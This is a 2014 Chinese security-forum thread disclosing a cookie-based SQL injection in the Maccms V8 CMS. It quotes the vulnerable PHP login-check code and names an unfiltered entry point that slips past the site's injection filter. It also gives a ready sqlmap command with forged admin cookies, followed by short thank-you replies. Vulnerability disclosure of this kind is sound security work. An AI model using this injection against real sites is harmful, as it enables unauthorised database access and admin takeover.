查看: 15965|回复: 8

Maccms V8 Sql Injection #1(有gpc限制)

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-6-22 12:23:51 | 显示全部楼层 |阅读模式
    是cookie注入,有gpc限制,4处注入点
    重现下发现过程
    1. inc/common/function.php
    直接获取cookie,未过滤
    [AppleScript] 纯文本查看 复制代码
    <pre><code>function getCookie($key)
    {
        if(!isset($_COOKIE[$key])){
            return '';
        }
        else{
            return $_COOKIE[$key];
        }
    }
    </code>

    2. admin/admin_conn.php
    chkLogin() 函数获取cookie未过滤
    [AppleScript] 纯文本查看 复制代码
    </pre>
    <pre><code>function chkLogin()
    {
        global $db;
        $m_id = getCookie('adminid'); //这里直接没有过滤
        $m_name = getCookie('adminname'); //这里直接没有过滤
        $m_check = getCookie('admincheck'); //这里直接没有过滤
        /*
        print '$m_id='.$m_id.'&lt;br&gt;';
        print '$m_name='.$m_name.'&lt;br&gt;';
        print '$m_check='.$m_check.'&lt;br&gt;';
        */
        if (!isN($m_name) &amp;&amp; !isN($m_id)){
            /*
            print '$sql=';
            print 'SELECT * FROM {pre}manager WHERE m_name=\'' . $m_name .'\' AND m_id= \''.$m_id .'\' AND m_status=1';
            print '&lt;br&gt;';
            */
            $row = $db-&gt;getRow('SELECT * FROM {pre}manager WHERE m_name=\'' . $m_name .'\' AND m_id= \''.$m_id .'\' AND m_status=1');
            if($row){
                $loginValidate = md5($row['m_random'] . $row['m_name'] . $row['m_id']);
                if ($m_check != $loginValidate){ 
                   sCookie ('admincheck','');
                   redirect('?m=admin-login','top.');
                }
            }
            else{
                sCookie ('admincheck','');
                redirect('?m=admin-login','top.');
            }
        }
        else{
            redirect('?m=admin-login','top.');
        }
    }</code>

    3. admin/editor/uploadshow.php
    但是cookie都通过了360_safe3.php保护,怎么办呢?当然是找漏网之鱼了,发现几处
    [AppleScript] 纯文本查看 复制代码
    </pre>
    <pre><code>&lt;?php
    require(dirname(__FILE__) .'/../admin_conn.php');
    chkLogin();
    $action=be("get","action");
    $id=be("get","id");
    $path=be("get","path");
    ?&gt;</code>

    此处调用完全没过滤,直接sqlmap开搞即可

    证明:
    官网不是这个程序,本地搭的
    >sqlmap.py -u "http://localhost/maccms8/admin/editor/uplo
    adshow.php" --cookie="adminid=1; adminname=admin; admincheck=aaaa" -p cookie
    2511311309ed73fed9bd982c3c0b0d736752b997.jpg
    漏洞作者: Mody

    评分

    参与人数 2i币 +20 收起 理由
    名哲 + 10 感谢分享
    管理01 + 10 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-5 19:19
  • 签到天数: 238 天

    [LV.7]常住居民III

    发表于 2014-6-22 14:42:40 | 显示全部楼层
    楼主请问gpc限制是什么东西?
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-23 12:43:42 | 显示全部楼层
    感谢分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-7-13 00:01:17 | 显示全部楼层
    不懂 过来顶一下
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-7-15 22:05:56 | 显示全部楼层
    看看......................
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-15 22:11:37 | 显示全部楼层
    好像很赞的样子
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-8-3 23:23:37 | 显示全部楼层
    学习一下,谢谢分享!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-9-17 15:44:24 | 显示全部楼层
    金币则么正
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-15 01:01:03 | 显示全部楼层
    学习了@@@@@@@@@
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 12:15 , Processed in 0.027497 second(s), 19 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部